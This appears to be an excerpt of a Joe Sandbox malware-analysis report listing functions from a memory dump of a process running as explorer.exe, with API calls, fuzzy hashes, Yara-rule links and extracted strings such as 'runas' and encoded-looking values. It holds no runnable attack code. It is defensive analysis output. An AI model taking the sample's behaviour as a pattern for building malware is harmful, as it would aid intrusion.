                                                  • Instruction ID: 52943416a439c1b3e0a9cb6c65a4ef0ed4d878b95de2b3900405bf0381a5a1f2
                                                  • Opcode Fuzzy Hash: ba1e5caf4e925d373b7c89a521f4f8ed2fc0376f1598d48e01317e5428b38096
                                                  • Instruction Fuzzy Hash: 6041D375D20265EFCB15EF55EC40AAEBBB4FF04710F148169D805AB241EB70EA81CB92
                                                  Function 032089E0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 322sleepthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000064,74D40A26,?,00000000,032490FD,000000FF), ref: 03208A1C
                                                  • __Init_thread_footer.LIBCMT ref: 03208AB6
                                                    • Part of subcall function 03229A98: EnterCriticalSection.KERNEL32(03268FA8,774D0F00,?,03208ABB,0326CDC0,03250100), ref: 03229AA2
                                                    • Part of subcall function 03229A98: LeaveCriticalSection.KERNEL32(03268FA8,?,03208ABB,0326CDC0,03250100), ref: 03229AD5
                                                    • Part of subcall function 03229A98: WakeAllConditionVariable.KERNEL32(?,0326CDC0,03250100), ref: 03229B4C
                                                  • CreateThread.KERNEL32(00000000,00000000,03208880,0326C578,00000000,00000000), ref: 03208B1B
                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03208B26
                                                    • Part of subcall function 03229AE2: EnterCriticalSection.KERNEL32(03268FA8,00000000,774D0F00,?,03208A41,0326CDC0), ref: 03229AED
                                                    • Part of subcall function 03229AE2: LeaveCriticalSection.KERNEL32(03268FA8,?,03208A41,0326CDC0), ref: 03229B2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                                                  • String ID: runas
                                                  • API String ID: 4065365256-4000483414
                                                  • Opcode ID: 359e1974691eda185f040a13cba6894234f1a45ab8c9a1beded6cb7ba33675a2
                                                  • Instruction ID: 39f15f94f653fc5ee5639d42eeda63c89604978b5a9c6f59b3bb77fdb2243c56
                                                  • Opcode Fuzzy Hash: 359e1974691eda185f040a13cba6894234f1a45ab8c9a1beded6cb7ba33675a2
                                                  • Instruction Fuzzy Hash: 1BB13972620248AFDB08EF28DC84B9E7F65EF45310F108218F8609B7C6DB7596C48B51
                                                  Function 0322C9B4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,0324BDDD,0322C9AB,0322B044,03227D59,74D40A26,?,?,?,00000000,0324C997,000000FF,?,03202576,?,?), ref: 0322C9C2
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0322C9D0
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0322C9E9
                                                  • SetLastError.KERNEL32(00000000,?,00000000,0324C997,000000FF,?,03202576,?,?,0000000F,03203BA5,00000000,0000000F,00000000,0324C330,000000FF), ref: 0322CA3B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: ff03e78d8b2bc404c739aca7242d99c0aa2ecedd4cf5486536af862f139a3845
                                                  • Instruction ID: 4b3e19067214c2eca83d66198d7291731e91427d93165d7845ee9f78dc244c3f
                                                  • Opcode Fuzzy Hash: ff03e78d8b2bc404c739aca7242d99c0aa2ecedd4cf5486536af862f139a3845
                                                  • Instruction Fuzzy Hash: C301283B1383327EE624FA75BCD896F2F48EF02975B304369F020D91D5EE9148815684
                                                  Function 03215240 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0320ACA0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,74D40A26,00000000,00000000), ref: 0320ACED
                                                    • Part of subcall function 0320A940: GetModuleFileNameA.KERNEL32(00000000,?,00000104,74D40A26,00000000,00000000), ref: 0320A98D
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 03215324
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FileModuleName
                                                  • String ID: #$246122658369$8a680c$ZJF=
                                                  • API String ID: 514040917-381243889
                                                  • Opcode ID: 9dcb0040d7868e8a66fba4c150b1d4868af09b158cc0cba4002693eb0411ca18
                                                  • Instruction ID: a884babdee30bb43c19110451dbc4dac117a34353cdcdddb1aa4dd8f89b6706f
                                                  • Opcode Fuzzy Hash: 9dcb0040d7868e8a66fba4c150b1d4868af09b158cc0cba4002693eb0411ca18
                                                  • Instruction Fuzzy Hash: 5F81A375920358ABDB24EF28CD497DDBBB5AB56304F6081C8E9051B281DBB45BC8CFD2
                                                  Function 0323F647 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • C:\Windows\SysWOW64\explorer.exe, xrefs: 0323F64C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Windows\SysWOW64\explorer.exe
                                                  • API String ID: 0-2751450654
                                                  • Opcode ID: ab87b140315887bf99874f8dd9ed8318fb404bfef41c5da68d6f429a18791ec8
                                                  • Instruction ID: a011361470f50950f9e8adc2221be3b2efa8ef180ff736eb74f1f672c2c3dd45
                                                  • Opcode Fuzzy Hash: ab87b140315887bf99874f8dd9ed8318fb404bfef41c5da68d6f429a18791ec8
                                                  • Instruction Fuzzy Hash: 1721F5F5A24306BFDB10EE71AD80D2B736DEF02268B044514F924DA650D7B0EC908BA0
                                                  Function 0322DA07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0322DAC8,?,?,00000000,?,?,0322DB7A,00000002,FlsGetValue,032533D8,032533E0,?), ref: 0322DA97
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID: api-ms-
                                                  • API String ID: 3664257935-2084034818
                                                  • Opcode ID: 998e87cf00d1799bd777b3efce44d585ea987ac08e28aa20cff8de91a04dd63c
                                                  • Instruction ID: 12d1e34341ec60ae3aaa9e000d3518c6716d18a8a785f8d6cc78130ecdffd18d
                                                  • Opcode Fuzzy Hash: 998e87cf00d1799bd777b3efce44d585ea987ac08e28aa20cff8de91a04dd63c
                                                  • Instruction Fuzzy Hash: F8119435A69332BBDF22DA6C9C44F9D7B98AF01770F1A4250ED25E7184D670EA8086D0
                                                  Function 0322DEA2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0322DE97,?,?,0322DE5F,00000000,00000000,?), ref: 0322DEB7
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0322DECA
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0322DE97,?,?,0322DE5F,00000000,00000000,?), ref: 0322DEED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 89256286e0ad68dbf99237a3fb87173bf195a68d4b0af08e59dd493de4b5ea3b
                                                  • Instruction ID: 3fe2e94cb62856325179cd8a4ab54205db80d09a908a7d1d7114e8aa349f6e6a
                                                  • Opcode Fuzzy Hash: 89256286e0ad68dbf99237a3fb87173bf195a68d4b0af08e59dd493de4b5ea3b
                                                  • Instruction Fuzzy Hash: 63F08231610229FBDF11EB50ED0DB9EBE68EF00756F144090F800E1450CB749F50DA90
                                                  Function 03235970 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • _free.LIBCMT ref: 03235C5B
                                                  • _free.LIBCMT ref: 03235C74
                                                  • _free.LIBCMT ref: 03235CB2
                                                  • _free.LIBCMT ref: 03235CBB
                                                  • _free.LIBCMT ref: 03235CC7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3291180501-0
                                                  • Opcode ID: 919d8559a8d10c9d5969a3fe6367357e85f183878e213f8f233501b13a73b820
                                                  • Instruction ID: 369560ddd98da0cbaa5ef7039e0a85eb722490c1b939ed0f885cfeb946618515
                                                  • Opcode Fuzzy Hash: 919d8559a8d10c9d5969a3fe6367357e85f183878e213f8f233501b13a73b820
                                                  • Instruction Fuzzy Hash: C8B13AB592121A9FDB24DF18C884AADB7B5FF4A304F2445EAD849A7350D770AED4CF80
                                                  Function 032354E5 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 032383E5: HeapAlloc.KERNEL32(00000000,03220D37,?,?,03229DCF,03220D37,?,032233CE,8B18EC84,774D0F00), ref: 03238417
                                                  • _free.LIBCMT ref: 032355F4
                                                  • _free.LIBCMT ref: 0323560B
                                                  • _free.LIBCMT ref: 03235628
                                                  • _free.LIBCMT ref: 03235643
                                                  • _free.LIBCMT ref: 0323565A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$AllocHeap
                                                  • String ID:
                                                  • API String ID: 1835388192-0
                                                  • Opcode ID: e1be256c3d9d3cd9649095c50d209188b905c85659ac8cf19938863ca454182c
                                                  • Instruction ID: 67f6fd5d8e4884e0172f810174b88d246bd148a990ea26fbd5e6479503ce458c
                                                  • Opcode Fuzzy Hash: e1be256c3d9d3cd9649095c50d209188b905c85659ac8cf19938863ca454182c
                                                  • Instruction Fuzzy Hash: AB51D6B5A20305AFDB21DF69DC40A6AB7F5EF4A720F240559E849DB250E771EA80CB80
                                                  Function 03227110 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                  • String ID:
                                                  • API String ID: 3354401312-0
                                                  • Opcode ID: 42fe8ea0d2c0979b397c1a336e8ed6359de093dd255ffa0e3b97cbe2ef1f5a7a
                                                  • Instruction ID: 352b70fff8d5a2103270f50067375b912b235d0936f1a71de9a1ee98bb70e5e6
                                                  • Opcode Fuzzy Hash: 42fe8ea0d2c0979b397c1a336e8ed6359de093dd255ffa0e3b97cbe2ef1f5a7a
                                                  • Instruction Fuzzy Hash: AE618CB4D1132AEFDF10DFA4C944BAEBBB8BF04304F144199D805AB242D775AA85CBA1
                                                  Function 0320F4B0 Relevance: 7.7, APIs: 5, Instructions: 159comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 0320F547
                                                  • CoCreateInstance.OLE32(0325DFA8,00000000,00000001,0325E008,?), ref: 0320F563
                                                  • CoUninitialize.OLE32 ref: 0320F571
                                                  • CoUninitialize.OLE32 ref: 0320F630
                                                  • CoUninitialize.OLE32 ref: 0320F644
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Uninitialize$CreateInitializeInstance
                                                  • String ID:
                                                  • API String ID: 1968832861-0
                                                  • Opcode ID: d96cc1a695f79e8658f843ba6bcfd9968a8618b9e9a1c9f198f3fa2b7f74f9ca
                                                  • Instruction ID: 95cb6bff87aa45465d6d6c883fb1fc5cf245c8edf45e567c749471bca9a9bf9e
                                                  • Opcode Fuzzy Hash: d96cc1a695f79e8658f843ba6bcfd9968a8618b9e9a1c9f198f3fa2b7f74f9ca
                                                  • Instruction Fuzzy Hash: DE51D971A20204AFDF14DFA4DD44BDEBFB9EF48314F108118E415EB291D774AA84CB90
                                                  Function 03224F10 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03224F46
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 03224F66
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03224F86
                                                  • std::_Facet_Register.LIBCPMT ref: 03225021
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 03225039
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                  • String ID:
                                                  • API String ID: 459529453-0
                                                  • Opcode ID: 85d748f2e69340df895e8085bd3a5b515082557077aa5bbfee8caff7a4153c9a
                                                  • Instruction ID: cf804e5d39059fff163f608f0a0f781c6fa63a0ebb1e558e6f90707e37b42e11
                                                  • Opcode Fuzzy Hash: 85d748f2e69340df895e8085bd3a5b515082557077aa5bbfee8caff7a4153c9a
                                                  • Instruction Fuzzy Hash: 7B41BF71910225EFCB24FF95DC40AAEBBB8EF44710F1481ADD8466B281DB70AA81CBD1
                                                  Function 03240EBB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 03240ED3
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03240EE5
                                                  • _free.LIBCMT ref: 03240EF7
                                                  • _free.LIBCMT ref: 03240F09
                                                  • _free.LIBCMT ref: 03240F1B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5d479e32fd45438127c9a4795a84defaebf63eae1a2f0aadefe293506dfb3bf4
                                                  • Instruction ID: be65ae05ca5363ebf7b7504f7121de769f8b06ade14c1b8895ba90e4b590b82d
                                                  • Opcode Fuzzy Hash: 5d479e32fd45438127c9a4795a84defaebf63eae1a2f0aadefe293506dfb3bf4
                                                  • Instruction Fuzzy Hash: 7BF06272534301AB8A39EB68F484C1AF7E9EE14710B69C809F549EFB00CF74F8C08A94
                                                  Function 03219710 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00002710,74D40A26,00000000,?), ref: 03219749
                                                    • Part of subcall function 0320A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,74D40A26,00000000,?), ref: 0320A4BA
                                                  • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,03267494,0000000E), ref: 032197C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AttributesFileFolderPathSleep
                                                  • String ID: Xq==$Zwyx
                                                  • API String ID: 70540035-1598395721
                                                  • Opcode ID: 19d34d3735cc88418250b202d427fa6939099d74fd87816daec256877ca402fc
                                                  • Instruction ID: b29be759ddbc10e070ab9dfcfa4c3e63a5c1115bb67317ef3065c9b17062e1b4
                                                  • Opcode Fuzzy Hash: 19d34d3735cc88418250b202d427fa6939099d74fd87816daec256877ca402fc
                                                  • Instruction Fuzzy Hash: 07C19F30D14388EFEF14DBA8C958BDDBFB6AF15304F248198D4446B282C7B55AC8DBA1
                                                  Function 0323F082 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: *?
                                                  • API String ID: 269201875-2564092906
                                                  • Opcode ID: aeec70a4035a5f63885e5f6ab4fcd7669b9cc105364cd78653b6bada5468aec7
                                                  • Instruction ID: 3e053745365665a96b60212342dd98eb4bd9ecf06425d4e345fe5206ac92bcb2
                                                  • Opcode Fuzzy Hash: aeec70a4035a5f63885e5f6ab4fcd7669b9cc105364cd78653b6bada5468aec7
                                                  • Instruction Fuzzy Hash: 5E612FB5D10219AFDF14CFA8D9805EDFBF5EF49710B1881A9D845F7300D6759E818B90
                                                  Function 032150A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleclosesocket
                                                  • String ID: 246122658369$ZtF=
                                                  • API String ID: 2025136489-1133631969
                                                  • Opcode ID: fbd2942ba6d24a2ad0b456b962568e9170d66bf32aa28636bcc62b6d7cfc2a18
                                                  • Instruction ID: 1e3da25384a06793355b51f162e841fe236a9edd447effe6e18e3dd6fea57703
                                                  • Opcode Fuzzy Hash: fbd2942ba6d24a2ad0b456b962568e9170d66bf32aa28636bcc62b6d7cfc2a18
                                                  • Instruction Fuzzy Hash: C0315775A20348ABDB04FF68CD4A78DBFA5EB46710F508248F8115B385CB7986C48BC2
                                                  Function 03204910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0320499F
